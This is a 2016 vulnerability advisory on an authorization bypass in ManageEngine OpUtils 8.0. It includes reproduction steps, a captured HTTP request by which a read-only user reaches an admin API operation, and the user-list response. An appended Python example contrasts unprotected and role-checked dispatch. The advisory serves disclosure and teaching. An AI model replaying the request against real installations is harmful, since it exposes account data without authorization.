Manage Engine OPutils 8.0 Authorization Bypass

Published 16 Feb 2016. Reported by Kaustubh G. Padwad. Type: packetstorm (packetstormsecurity.com).

A Missing Function Level Access Control vulnerability in ManageEngine OpUtils enables a normal user to execute administrative tasks.

`==================================================  
Missing Function Level Access control Vulnerability in OPutils  
==================================================  
  
. contents:: Table Of Content  
  
Overview  
========  
  
Title: Missing Function Level Access Control Vulnerability in ManageEngine OpUtils  
Author: Kaustubh G. Padwad  
Vendor: ZOHO Corp  
Product: OPUTILS  
Tested Version: OPUTILS 8.0  
Severity: Medium  
  
Advisory ID  
============  
2016-06-Manage_Engine  
  
  
About the Product:  
==================  
OpUtils is a Switch Port & IP Address Management software that helps network engineers manage their Switches and IP Address Space with ease. With its comprehensive set of 30+ tools, it helps them to perform network monitoring tasks like detecting a rogue device intrusion, keep a check on bandwidth usage, monitoring availability of critical devices, backing up Cisco configuration files and more.  
  
  
Description:   
============  
  
This Missing Function Level Access Control vulnerability enables a normal (non-administrative) user to execute administrative tasks: the administrative API operations are reachable with any authenticated session, because the server checks that the caller is logged in but not that the caller holds the Administrator role.  
  
Vulnerability Class:  
====================  
2013-A7-Missing Function Level Access Control https://www.owasp.org/index.php/Top_10_2013-A7-Missing_Function_Level_Access_Control  
  
  
How to Reproduce: (POC):  
========================  
  
* Obtain an administrative task URL, either from the vendor's demo site or from a locally installed copy of the product.  
  
* Log in as a normal (non-administrative) user.  
  
* Issue the request below (or any other administrative operation), for example: http://IP-OF-Server:7080/oputilsapi/admin?v=1&format=json&key=375e0fa0-0bb3-479c-a646-debb90a1f5f0&operation=GET_USER_DETAILS  
  
POC  
====  
  
Burp Request  
------------  
GET /oputilsapi/admin?v=1&format=json&key=375e0fa0-0bb3-479c-a646-debb90a1f5f0&operation=GET_USER_DETAILS HTTP/1.1  
Host: 192.168.1.10:7080  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
X-Requested-With: XMLHttpRequest  
Referer: http://192.168.1.10:7080/apiclient/ember/index.jsp  
Cookie: OPUTILSJSESSIONID=C256E5B41CC23B33ACF94D206E243FB2; JSESSIONID=B59D8FD4B17DB7200A991299F4034DF1; OPUTILSJSESSIONIDSSO=28A377BA0B7D0C6E21D1E2B3A3E4A371  
Connection: keep-alive  
  
Response  
--------  
HTTP/1.1 200 OK  
Server: Apache-Coyote/1.1  
Content-Type: application/json;charset=UTF-8  
Content-Length: 589  
Date: Thu, 04 Feb 2016 14:28:25 GMT  
  
{"result":[{"ad-domain-name":"","user-name":"admin","account-created-time":"30 Jan 16, 12:20 AM","Action":"","user-contactinfo-id":"1","user-role":"Administrator","user-description":"--","user-phone-number":"","user-email":"","user-id":"1","ad-domain-id":"","user-login-id":"1"},{"ad-domain-name":"","user-name":"kk","account-created-time":"30 Jan 16, 12:23 AM","Action":"","user-contactinfo-id":"2","user-role":"Read Only User","user-description":"--","user-phone-number":"","user-email":"","user-id":"2","ad-domain-id":"","user-login-id":"2"}],"input":"{userId=null}","status":"Success"}  
  
Server: Apache-Coyote/1.1  
Access-Control-Allow-Origin: *  
Access-Control-Allow-Methods: GET,POST  
Access-Control-Max-Age: 5000  
Content-Type: application/json;charset=UTF-8  
Date: Sat, 30 Jan 2016 21:39:03 GMT  
Content-Length: 19  
  
{"resolved":true}  
  
Mitigation  
==========  
Upgrade to the next Service Pack.  
  
Disclosure:   
===========  
04-Feb-2016 Reported to vendor  
11-Feb-2016 Fixed By Vendor  
  
Credits:  
========  
* Kaustubh Padwad  
* Information Security Researcher  
* [email protected]  
* https://twitter.com/s3curityb3ast  
* http://breakthesec.com  
* https://www.linkedin.com/in/kaustubhpadwad  
`
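Added example (not part of the advisory and not OpUtils code): a Python sketch of the missing control, placing an admin-API dispatcher that only checks for a valid session beside one that also checks the caller's role for each operation, driven by the GET_USER_DETAILS request shown above. The session table, the per-operation role allow-list and the session ids are constructed assumptions; the role strings are the ones in the advisory's JSON response.

```python
from urllib.parse import parse_qs, urlsplit

# Constructed session table (example data, not OpUtils internals). The role
# strings are those returned in the advisory's GET_USER_DETAILS response.
SESSIONS = {
    "readonly-session": {"user-name": "kk", "user-role": "Read Only User"},
    "admin-session": {"user-name": "admin", "user-role": "Administrator"},
}

# Hypothetical allow-list: each admin operation names the roles permitted to call it.
# Operations not listed here are rejected, so a new operation cannot ship unprotected.
OPERATION_ROLES = {
    "GET_USER_DETAILS": {"Administrator"},
}

def operation_from_url(url):
    """Extract the 'operation' query parameter, as used by /oputilsapi/admin."""
    return parse_qs(urlsplit(url).query).get("operation", [""])[0]

def vulnerable_dispatch(session_id, url):
    """Checks only that the caller is logged in (authentication), never the role.
    This is the OWASP A7 pattern: any valid session reaches the admin operation."""
    user = SESSIONS.get(session_id)
    if user is None:
        return 401, {"status": "Unauthenticated"}
    return 200, {"status": "Success", "operation": operation_from_url(url),
                 "caller": user["user-name"]}

def hardened_dispatch(session_id, url):
    """Authenticates, then authorizes the specific operation against the caller's role."""
    user = SESSIONS.get(session_id)
    if user is None:
        return 401, {"status": "Unauthenticated"}
    operation = operation_from_url(url)
    allowed_roles = OPERATION_ROLES.get(operation)
    if allowed_roles is None:
        # Deny by default: unknown or unlisted operations never run.
        return 400, {"status": "Unknown operation", "operation": operation}
    if user["user-role"] not in allowed_roles:
        # The server-side role check is the missing control; hiding the link in the UI is not enough.
        return 403, {"status": "Forbidden", "operation": operation}
    return 200, {"status": "Success", "operation": operation, "caller": user["user-name"]}

# The request line from the advisory; the key value is the one printed there.
ADVISORY_URL = ("http://192.168.1.10:7080/oputilsapi/admin?v=1&format=json"
                "&key=375e0fa0-0bb3-479c-a646-debb90a1f5f0&operation=GET_USER_DETAILS")

if __name__ == "__main__":
    print(vulnerable_dispatch("readonly-session", ADVISORY_URL))  # status 200: the bug
    print(hardened_dispatch("readonly-session", ADVISORY_URL))    # status 403: fixed
```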
